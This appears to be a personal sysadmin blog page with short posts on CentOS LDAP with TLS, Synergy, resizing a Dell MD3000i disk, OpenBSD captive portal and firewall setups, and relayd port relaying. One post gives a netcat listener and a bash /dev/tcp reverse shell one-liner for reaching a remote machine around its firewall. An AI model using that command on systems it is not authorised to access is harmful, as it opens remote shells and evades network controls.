Computerglitch

An ongoing adventure

CentOS 6.3 LDAP With TLS - Quick & Dirty

This post is an overview of the commands needed to setup a basic working LDAP TLS server using CentOS 6.3. I will also go over the process of creating a POSIX user account and a POSIX group. The archived version of this is for CentOS 6 and can be found here: CentOS 6 LDAP With TLS

Add the following to your iptables configuration to allow access through the firewall, then install the required packages for your LDAP server.

/etc/sysconfig/iptables

1
2
3
4
5
6

-A INPUT -m state --state NEW -m tcp -p tcp --dport 389 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 636 -j ACCEPT

service iptables restart

yum install migrationtools openldap-servers openldap openldap-clients openldap-devel

Create the LDAP administrative password, be sure to save the SSHA generated string so we can add it to the bdb.ldif config file in the next step.

1
2
3
4

slappasswd
New password: <password>
Re-enter new password: <password>
{SSHA}2Gv8HLL8SB5pMTbMB3b5AFAE4A5sDPPE

Reverse Shell on CentOS

I wanted an easy way to get to the shell on my remote machine bypassing the firewall etc.

I’m going to refer to the systems as follows: OurSystem TargetSystem

On OurSystem we need to open a listening network connection using netcat. This can be any port we want, but I’m going to use port 443 because it’s allowed through firewalls.

1

nc -l 443

Note: Make sure the firewall isn’t blocking the listening port you choose on OurSystem

Next we need to force a bash shell back to OurSystem from TargetSystem. On the TargetSystem execute the following, substitute 12.3.4.5 with the external IP of OurSystem, substitute 443 with the port you set netcat to listen on.

1

bash -i >& /dev/tcp/12.3.4.5/443 0>&1

You should be greeted with a bash shell from TargetSystem on OurSystem.

Synergy

I have a CentOS box and a Windows XP box I wanted to be able to easily switch between. Instead of using a KVM switch I decided to use Synergy to switch between two monitors.

To setup Synergy I first installed it on CentOS from the EPEL repo:

1

yum install synergy-plus

For reference my systems are: xp=WindowsXP Box despina=CentOS Box (replace xp and despina with your system names) Once Synergy is installed you must configure it. First edit /etc/synergy.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

section: screens
xp:
despina:

end

section: links

xp:
right = despina

despina:
left = xp

end

Increase Dell MD3000i Virtual Disk Size

I needed to increase the size of a virtual disk on my Dell MD3000i. The MD3000i provides the storage space for my vSphere VM’s. The interface ‘Modular Disk Storage Manager’ does not provide a way to increase the size. To increase the size you must use the SMcli.exe (command line interface) provided with the Storage Manager client.

From the computer the ‘Modular Disk Storage Manager’ is installed on, open a CMD window and change to the following directory:

1

C:\Program Files\Dell\MD Storage Manager\client>

From this directory execute the following command (an explanation of the switches is below):

1

smcli -n Production_Storage -c "set virtualDisk [\"virtual_disk_name\"] addCapacity=26843545600;" -p "password"

Where Production_Storage is the name of your storage array, virtual_disk_name is the name of the virtual disk to increase, 26843545600 is the amount to increase the virtual disk in bytes (in this case 25GB, use this calculator to convert from GB to Bytes: Convert GB to Bytes), and password is the password to the storage array.

Once the operation is complete you will need to extend the Datastore in vSphere.

Locate the datastore, right-click the datastore, select properties and select the ‘Increase …’ button. Next you should see a selection of available devices and the same LUN should appear, select it and click next. Vsphere should see the additional free space and upon clicking next it will expand the volume.

Captive Portal With PF

I had a need to create a captive portal at a customer site without installing a new piece of hardware.

I decided to create a OpenBSD VM with the following configuration to make users authenticate on the gateway before being allowed internet access.

The OpenBSD VM needs two virtual NIC’s. I configured my networking in OpenBSD as follows:

1
2

pcn0 - 192.168.0.100
pcn1 - 192.168.0.101

The file /etc/mygate needs to have the IP of the current working gateway. Mine was:

1

192.168.0.10

Transparent Firewall With OpenBSD VM

I had a job where I needed to place a firewall in front of a network of publicly accessible computers. I decided to use a virtual transparent firewall to protect the entire network and make no changes on the client computers. This is document describes how I did it.

First the hardware: I decided to use a Dell Poweredge 1900 with ESXi server. The server has (2) Quad Core Processors, 16GB of RAM and 3 NICs. The storage is local with 4 drives set in a RAID 5 providing 600GB of storage.

Now for the NIC setup. You can see from the below diagram the BSD Bridge is setup on vmnic0 and vmnic1, vmnic2 is reserved for management and other VM’s.

Port Relay With Relayd on OpenBSD

I had originally planned on setting up the new server in the DMZ giving it a public IP address, updating the DNS record and going happily about my business but I decided to try something a little different. OpenBSD has a very cool load balancing program named Relayd (which used to be called hoststated). It can be setup to forward, reverse, redirect or accelerate packets.

For my use I wanted Relayd to act as a tcp port relay and redirect all www packets bound for my public IP to be redirected to my webserver in the DMZ, you can see the traffic flow below:

internet --> relayd forward (box1) --> server (box2)

To achieve this I edited my /etc/relayd.conf as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

box1_addr="10.1.1.2"
box1_port="80"
box2_addr="10.1.1.3"
box2_port="80"

## TCP port relay and forwarder
#
protocol "tcp_service" {
                   tcp { nodelay, socket buffer 65536 }
           }

           relay "tcp_forwarder" {
                   listen on $box1_addr port $box1_port
                   protocol "tcp_service"
                   forward to $box2_addr port $box2_port
           }

Once my /etc/relayd.conf setting was in place I started relayd with the following command:

1

relayd -f /etc/relayd.conf

Additionally to make sure Relayd starts at boot time I added the following to my /etc/rc.conf.local file:

1

relayd_flags=""

And with that, all web traffic bound for my network is being successfully relayed to my external webserver in the DMZ, no changes to DNS were made.